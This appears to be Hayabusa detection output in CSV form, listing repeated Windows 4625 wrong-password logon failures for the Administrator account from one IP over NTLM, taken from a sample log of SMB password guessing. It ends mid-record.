+2016-09-19 16:50:34.922 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YFQsEbZnm94eSuUl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.965 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UnNcBIPoWdJH0x7M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:34.997 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Fw1xVFyar0Cal2J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.040 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWzn4Oa8PQdH9Gqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b68beIB5BKyMv8d3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.124 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HeXSJhEXzpiRX8BT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.169 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQ8Zu7ByLWddD4Tk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: paQzUptV8scmJvsG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.234 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WQLsoIX9LPvbockz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.272 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xRYbdVMbUlqFK8oM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OSO730O1fxDL4DfQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.352 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wmniv339HLGKB4u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.397 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rO3mxvgSES0lVN34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.433 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fvK9k9tnCq5hwBqe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.465 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ujFfMT6I6L8OHag9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.517 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FWKY2Wh21sePUR1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.562 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6E6yf8D5cPOEwR0y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.605 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OpFho8k52BkBlg4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.645 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ucDvfSfDYZzjNWFS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vnq3S0gEE98xfYLv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: seVfaEdAS6lEXgkG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.764 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gz8BQAlyYXB61tx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.805 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkHLs6yikRWVjj9F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.840 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0bQUcnUBCmE81G6I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.873 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BceDCcXoHJQv9pDi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.916 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GCCLt49g8wmAMEyV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.947 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pM6C8KRcxVIUsZrZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:35.984 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fw5DU6l3QRVl9cWY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 37UthbuO3m4Lr7dU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: URB7Ji5pQleLtvy4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.101 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: orP9OgiBrYIKZPXE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.132 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZwvdnlIWhqoDg8On | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v6dXVbmLBpXc39ah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.229 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8Mu7amiHAg0l7bza | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JdG6F697kAXFDx9m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.321 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jY5AAnfQMH3VZQUa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iVep4j7jZZAOAQAj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.393 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KWWtGIQx8jBgAeoH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.427 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zn8X8gen8gX9i3QK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.476 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B9OdUM99RBHzwgVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.518 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJbBVm6wDrqyQmpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.564 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tAVRBfMxIyrfsEtR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wuCIClZihRxRyjGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yxhpEP6nnmihvkHB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.833 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1HYmJDrWmKjj8DF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.872 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V81dIfR2SRNDk3a2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.908 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vaZpLaxB1kcCXqHP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.949 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRhs8IoV6R6vyCdL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:36.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4wUYds3Ym3G2abrV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tmBfxm6pPLlSEsUI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.056 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VbAuqFggx0zz5iEn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8cytpVOjb4KrNaGg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.149 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BFFFt7eFzmlzbHhG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.184 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AJQBZZiNKVGXzx4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7gyu6EyrtbyowTfC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.267 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aASpkRuPfE8Nl64n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.306 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MSI2b7LpZpWO3xJW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.344 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: avNkOq3fsGN3yYJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wnlgy6dW33tRk6UX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: msJ8QrqMluTeUlM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H33NuKduMuskxL0D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.500 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2BHjp69CD1ttbaK2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5uxByLPApvfeIhU2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6g0WOAnoGpKyEyzW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.640 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P8MTs4Nkbm3ryqcp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.688 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0Nyd7tr3y0BHmPLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.731 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J5KiDQOEnDf6xEPN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3MBP1buuRcBRiQTG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.804 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DXXdcg3MSqnGSvax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Kej7zgIDCNR5tnnp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.884 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM8SOeQXwytB6iw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XPNATM0IL05vtbZ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:37.964 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H56ci5gbBVzebS2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.008 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rRofLg1uxrojU7n | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.048 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MAhtwTU8OttAhcxf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CwKgAR6OWbkFlxUy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.129 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lNZR4G0DVsXVg4A9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:38.174 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZG99tl0RRN3cQoK | IP Addr: 192.168.198.149 | AuthPackage: 